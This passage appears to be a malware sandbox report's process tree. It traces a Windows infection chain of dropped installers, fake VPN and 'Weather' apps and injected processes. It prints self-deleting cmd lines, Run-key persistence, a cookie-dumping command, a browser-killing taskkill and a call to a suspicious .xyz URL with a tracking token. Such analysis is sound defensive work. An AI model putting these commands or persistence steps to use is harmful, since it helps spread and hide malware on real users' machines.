                                                                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                          PID:7776
                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\HookSetp.exe
                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\HookSetp.exe"
                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                        PID:5088
                                                                                                                                                                                                                                                                                                        • C:\ProgramData\3899994.exe
                                                                                                                                                                                                                                                                                                          "C:\ProgramData\3899994.exe"
                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          PID:5884
                                                                                                                                                                                                                                                                                                        • C:\ProgramData\4370781.exe
                                                                                                                                                                                                                                                                                                          "C:\ProgramData\4370781.exe"
                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                                                          PID:5320
                                                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                                                                                                                            "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            PID:6556
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\w3nwpdtekvj\12h3h2q0dk4.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\w3nwpdtekvj\12h3h2q0dk4.exe" /ustwo INSTALL
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                  PID:5228
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "12h3h2q0dk4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\w3nwpdtekvj\12h3h2q0dk4.exe" & exit
                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                      PID:6728
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                        taskkill /im "12h3h2q0dk4.exe" /f
                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                        PID:6160
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\grvzaceuoel\vpn.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\grvzaceuoel\vpn.exe" /silent /subid=482
                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                    PID:6048
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-O5FUM.tmp\vpn.tmp
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-O5FUM.tmp\vpn.tmp" /SL5="$103C6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\grvzaceuoel\vpn.exe" /silent /subid=482
                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                      PID:5348
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                          PID:5316
                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                                                                            tapinstall.exe remove tap0901
                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                            PID:5396
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                            PID:7544
                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                                                                              tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                PID:4172
                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                PID:7612
                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                  PID:6000
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\y51cod00zjd\3322xabbuuo.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\y51cod00zjd\3322xabbuuo.exe"
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                PID:6036
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\y51cod00zjd\3322xabbuuo.exe"
                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                    PID:5416
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                      ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                      PID:5296
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4lgztrckrya\KiffApp1.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\4lgztrckrya\KiffApp1.exe"
                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  PID:6012
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ylcov1fddfp\IBInstaller_97039.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ylcov1fddfp\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                  PID:4332
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-HKE5P.tmp\IBInstaller_97039.tmp
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-HKE5P.tmp\IBInstaller_97039.tmp" /SL5="$30210,9971708,721408,C:\Users\Admin\AppData\Local\Temp\ylcov1fddfp\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    PID:5524
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                        PID:5724
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-6VKNQ.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-6VKNQ.tmp\{app}\vdi_compiler"
                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                        PID:5772
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-6VKNQ.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                            PID:5224
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                              ping localhost -n 4
                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                              PID:6604
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kkugfa5npcf\app.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\kkugfa5npcf\app.exe" /8-23
                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                      PID:6004
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\kkugfa5npcf\app.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\kkugfa5npcf\app.exe" /8-23
                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                          PID:6464
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wwh3tkevy0w\d4mtmn4mg2m.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\wwh3tkevy0w\d4mtmn4mg2m.exe" /quiet SILENT=1 AF=756
                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                        PID:5388
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\wwh3tkevy0w\d4mtmn4mg2m.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\wwh3tkevy0w\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617684823 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                            PID:4916
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22J7AW4S2N\setups.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\22J7AW4S2N\setups.exe" ll
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                    PID:3032
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-TGJ8V.tmp\setups.tmp
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-TGJ8V.tmp\setups.tmp" /SL5="$501E0,1845714,55808,C:\Users\Admin\AppData\Local\Temp\22J7AW4S2N\setups.exe" ll
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                      PID:940
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                  PID:2960
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                    PID:2284
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                      PID:4108
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                  PID:3612
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:4128
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                        PID:4476
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    PID:3104
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:5052
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                          PID:4320
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                      PID:4404
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:6104
                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\5986493.exe
                                                                                                                                                                                                                                                                                                                          "C:\ProgramData\5986493.exe"
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:4932
                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\4201105.exe
                                                                                                                                                                                                                                                                                                                            "C:\ProgramData\4201105.exe"
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:7212
                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\6271119.exe
                                                                                                                                                                                                                                                                                                                              "C:\ProgramData\6271119.exe"
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:7240
                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\6271119.exe
                                                                                                                                                                                                                                                                                                                                  "{path}"
                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                    PID:6896
                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\2229556.exe
                                                                                                                                                                                                                                                                                                                                  "C:\ProgramData\2229556.exe"
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:4148
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:7372
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:6624
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:7856
                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                  PID:4080
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:4200
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:4784
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                  PID:4920
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:4876
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:4772
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:5788
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                    PID:5960
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding D62DE3F2CF82B405B1A613A535E6F852 C
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      PID:5200
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 78A39698D75240412C9BB333586D2B3C
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      PID:6320
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                      PID:4876
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:5368
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                              PID:1540
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1b0,0x1ec,0x7ffc453c9ec0,0x7ffc453c9ed0,0x7ffc453c9ee0
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:5032
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
